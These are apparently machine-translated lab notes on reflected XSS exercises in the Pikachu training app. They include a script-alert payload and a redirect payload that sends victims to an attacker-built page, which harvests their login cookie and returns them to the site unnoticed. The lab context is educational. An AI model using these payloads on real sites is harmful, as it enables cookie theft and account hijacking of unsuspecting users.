1. Reflection xss (get)
<Script> alert (1) </ script> (due to the constraint length, the need to modify the length of the front end)
2. Reflector xss (post)
After landing and the first case of the same, but here the client can steal cookie
Cheat cookie :( process like the process and the input box does not matter, mainly to encourage users to click)
(1) :( user to click as input box: <script> document.location = 'http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html'; </ script>)
http://127.0.0.1:801/pikachu-master/pkxss/xcookie/post.html(post.html build for themselves a malicious site)
(2) the site sends a request to the target site http://127.0.0.1:801/pikachu-master/vul/xss/xsspost/xss_reflected_post.php (equivalent to a request to pick up the user's cookie by the user, that does not csrf yet ....) and then get the site's user login cookie
(3) In order to prevent a malicious Web site users found something wrong, re back to normal site
